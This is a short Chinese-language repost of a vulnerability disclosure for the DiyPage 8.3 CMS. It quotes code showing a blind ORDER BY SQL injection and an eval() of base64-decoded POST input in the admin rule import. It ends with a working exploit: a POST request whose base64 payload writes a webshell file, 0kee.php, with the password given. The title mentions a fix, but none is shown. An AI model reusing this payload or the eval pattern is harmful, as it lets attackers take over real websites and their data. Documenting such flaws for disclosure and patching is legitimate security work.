网站地图    收藏   

主页 > 后端 > 网站安全 >

DiyPage8.3 orderby注入和代码执行漏洞及修复 - 网站

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] mod\dpcms\js\searchsubmit.php第36行$srchorder= $_GET[#39;srchorder#39;] ? $_GET[#39;srchorder#39;] : #39;eid#39;;第52行 $sql=#39;SELECT eid,builddate,title,author,content#39;; $sql......

 

mod\dpcms\js\searchsubmit.php

第36行

 

 

$srchorder= $_GET['srchorder'] ? $_GET['srchorder'] : 'eid';

 

 

第52行

 

 

        $sql='SELECT eid,builddate,title,author,content';

        $sql.=' FROM '.DP_DBPREFIX.'cms_entry WHERE active=1 AND';

        。。。。。。

        。。。。。。。。。。。

               $sql.=' ORDER BY '.$srchorder.' '.$ascdesc;

        $sql.=' LIMIT '.$offset.','.$srchtotal;

        $query=$db->query($sql);

 

 

猪肉点在order by后面  又无错误回显  只能盲注

 

 

二、后台代码执行

这是个类似于后门的洞子  但到底是不是   不敢断言

mod\spider\cp\rule_import.php第8行

 

 

if ($_POST['issubmit']==true) {

        $importarray=array();

        eval(b64($_POST['rulestr']));

 

 

下面是inc\func.php 里的b64函数

 

 

function b64($str,$encode=false) {

        if ($encode) {

                return '[b64]'.base64_encode($str);

        }else{

                if (substr($str,0,5)=='{b64}' or substr($str,0,5)=='[b64]') {

                        return base64_decode(str_replace(array('{b64}','[b64]'),'',$str));

                }else{

                        return $str;

                }

        }

}

 

 

EXP:进后台后

 

 

http://www.2cto.com /admin.php?mod=modcp&formod=spider&item=ruleadm&do=import

提交以下POST包至此

issubmit=true&rulestr=[b64]JGZwID0gZm9wZW4oIjBrZWUucGhwIiwgInciKTtmd3JpdGUoJGZwLCAiPD9ldmFsKFwkX1BPU1RbMGtlZV0pOz8+Iik7ZmNsb3NlKCRmcCk7

根目录下生成0kee.php  密码0kee

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论